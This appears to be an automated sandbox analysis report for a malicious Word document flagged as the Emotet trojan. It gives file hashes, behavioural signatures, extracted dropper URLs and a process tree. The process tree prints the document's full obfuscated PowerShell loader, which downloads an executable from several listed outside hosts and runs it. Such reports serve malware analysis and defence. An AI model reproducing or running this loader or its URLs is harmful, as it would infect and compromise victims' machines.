Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
22-05-2024 22:22
General
-
Target
68d5f66df460cd50a2293b61755f8cfc_JaffaCakes118.doc
-
Size
181KB
-
MD5
68d5f66df460cd50a2293b61755f8cfc
-
SHA1
a709c61f90991220154b71d110578d4dfb7196b6
-
SHA256
49e036cc8c59a83ee290f04d7fc143970ebc95c9d3d8d1ca048134091e989346
-
SHA512
c0d3e9c309f469d9377461a55a91c1ea04f9157cf6b002ecb2a3c69d957a829b865fccdcc48955ab1b246ddf1d5d897cd6ddddb461ad7d25dc050cdb7cb186fc
-
SSDEEP
3072:P8AOfnpC8pN7tpTBOIM7zVHSLbXTWgzGUXeE3aR5rnj:P8AOfpC8pN7tpTBOI+VHSfXTWMfHaR5f
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://krems-bedachungen.de/fyKDV/
exe.dropper
http://4glory.net/btKzNVlg/
exe.dropper
http://angelabphotography.com/4hR1e/
exe.dropper
http://dekormc.pl/js/ncrILdi/
Signatures
-
Emotet
Emotet is a trojan that is primarily spread through spam emails.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 6 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\68d5f66df460cd50a2293b61755f8cfc_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell (('(Jxu3Jxu+JxuhJxu+JxuRnsJxu+JxuaJxu'+'+JxudJxu+Jxuasd = &(efpnefp+efpJx'+'u+Jxueefp+'+'efJxu+JxupJxu+Jxuw-objeceJxu+'+'JxufJxu+JxupJxu+Jxu+eJxu+J'+'xufptefp) random;3Jxu+JxuhJxu+JxuRYJxu+J'+'xuYJxu+Jx'+'uU =Jxu+Jxu Jxu+Jxu.Jxu+Jxu(Jxu+JxuefpnJxu+JxueJxu+Jxue'+'fp+efJxu+JxupJxu+JxuwJxu+Jx'+'uefpJxu+Jxu+eJxu+Jxufp-objecteJxu+Jxufp) Sy'+'sJxu+Jxutem'+'.Net.WebClJxu+JxuieJxu+JxuntJx'+'u+Jxu;3Jxu+JxuhRJxu+Jx'+'uNJxu+JxuSB = 3Jxu+JxuhRJxu+JxunJxu+JxusadJxu+JxuasdJxu+J'+'xu.neJx'+'u+JxuxJxu+JxutJxu+Jxu(Jxu+Jxu10000Jxu+Jxu,Jx'+'u+Jx'+'u 28213Jxu+Jxu3)Jxu+Jxu;Jxu+Jxu3hRADJxu+Jxu'+'C'+'XJxu+Jxu Jxu+'+'Jx'+'u= '+'ef'+'p http:/Jxu+Jxu/lg'+'lab.Jxu+Jxuco.Jxu+JxuukJxu+Jxu/vsiJxu+Jxu6YDJxu+JxurX/@hJxu+JxuttJxu+Jxup://Jxu+JxukJxu+JxureJxu'+'+JxumJxu+'+'JxusJxu+Jxu-beJxu+JxudaJxu+JxuchungenJxu+Jxu.Jxu+JxudeJxu+Jx'+'u/Jxu+JxufyKDVJxu+Jxu/Jxu+Jxu@http:Jxu+Jx'+'u//4glorJxu+Jxuy.net/bJxu+J'+'xutKzJxu+JxuNVlg/@Jxu+JxuhttpJxu+Jx'+'u://aJxu+JxungelJxu+JxuabphotogJxu+Jxuraph'+'y.Jxu+JxucJxu+JxuomJxu+Jxu/Jxu+Jxu4hJxu+Jxu'+'R1eJxu+Jxu/@htJxu'+'+JxutJxu+Jxup:Jxu+Jxu//dekormJxu+Jxuc.Jxu+JxupJxu+JxulJxu+Jxu/J'+'xu+Jxujs/Jxu+JxuncrJxu+JxuILdiJxu+Jxu/eJxu+Jxufp.SJxu+JxupJxu+Jxulit(efpJxu+Jx'+'u@eJxu+Jxufp);Jxu+Jxu3hRSDC = 3Jxu+JxuhRenvJxu'+'+Jxu:publiJxu+JxucJ'+'xu+Jxu + efJxu+'+'Jxup7FMJxu+J'+'xuefpJxu+Jxu + Jxu+Jxu3hRN'+'SB Jxu+Jxu+Jxu+Jxu'+' (Jxu+JxuefpJxu+Jxu.exefp+Jxu+JxueJxu+JxufJ'+'xu+JxupeJxu+JxuefJxu+Jxup);foJxu+JxurJxu+JxueacJxu+Jxuh(Jxu+Jxu3hRasfc iJxu+JxunJxu+Jxu 3hJxu+JxuRADJxu+'+'JxuCX)Jxu+Jxu{Jx'+'u+JxutJxu+Jxur'+'Jxu+Jxuy{3hRYYU.EJxu+JxuLBJxu+JxuDoJx'+'u+JxuTY0W'+'nlT'+'Y0OadFITJxu+JxuYJxu+Jxu0lJxu+JxueEJxu+JxuLJxu+JxuB(3hRasfc.E'+'LBToStJxu+JxurTJxu+JxuYJxu+Jxu0Jxu+JxuiTJxu+JxuYJxu+Jxu0NgELJxu+JxuBJxu+Jxu()Jxu+Jxu, 3Jxu+JxuhRSDC);&(efpInvJxu+JxuoefpJxu+Jxu+efpkeJxu+'+'Jxuf'+'p+efp'+'e-It'+'emeJxu+JxufpJxu+'+'Jxu)Jxu+Jxu(3hJxu+JxuRSJx'+'u+JxuDCJxu+Jxu);breakJxu+Jxu;Jxu+Jxu}catch{}Jxu+Jxu}Jxu).R'+'EpLACe(Jxu7FMJxu,JxuD2cJxu).REpLACe(JxuefpJxu,[STRinG][Char]39).REpLACe('+'Jxu3h'+'RJxu,Jxus'+'uKJxu).REpLACe(JxuELBJxu,[STRinG][Char]34).REpLACe(JxuTY0Jxu,[STRinG][Char]96) tMo. ( suKPshOme[4]+suKPSHoMe[30]+JxuxJxu)')-CreplaCE 'tMo',[cHar]124-CreplaCE 'Jxu',[cHar]39-rEPlAcE 'suK',[cHar]36 -rEPlAcE ([cHar]68+[cHar]50+[cHar]99),[cHar]92) |.( $SHELLID[1]+$sHELlID[13]+'X')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD5499b0beb48c719378a542990198390a3
SHA18df410d2650f9419a9ae3fcf801dba9260ed7b48
SHA256cd4648c7bbafefb8db034e40c03421e0c19a841b8fac1a5d3c8cc4b6a8ffd9bc
SHA512b57eaf1bd5e1c82793314c598fb71eda5b7a4bfcdebea991f2bf5857f11cb5f9238d85615bdb8126aee52efd68a5a585b284cae18f1568ebf80c42c8f7d3e19f
-
memory/1136-0-0x000000002FB11000-0x000000002FB12000-memory.dmpFilesize
4KB
-
memory/1136-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1136-2-0x000000007138D000-0x0000000071398000-memory.dmpFilesize
44KB
-
memory/1136-18-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-21-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-136-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-168-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-167-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-124-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-115-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-102-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-68-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-67-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-66-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-65-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-64-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-63-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-62-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-61-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-59-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-58-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-57-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-56-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-55-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-54-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-53-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-52-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-50-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-49-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-48-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-47-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-46-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-45-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-44-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-43-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-42-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-41-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-40-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-38-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-37-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-36-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-35-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-34-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-33-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-32-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-31-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-30-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-29-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-27-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-26-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-25-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-24-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-23-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-22-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-20-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-19-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-14-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-60-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-51-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-13-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-12-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-11-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-10-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-9-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-8-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-39-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-7-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-28-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-17-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-16-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-15-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-6-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-175-0x000000007138D000-0x0000000071398000-memory.dmpFilesize
44KB
-
memory/1136-176-0x0000000000470000-0x0000000000570000-memory.dmpFilesize
1024KB
-
memory/1136-192-0x000000007138D000-0x0000000071398000-memory.dmpFilesize
44KB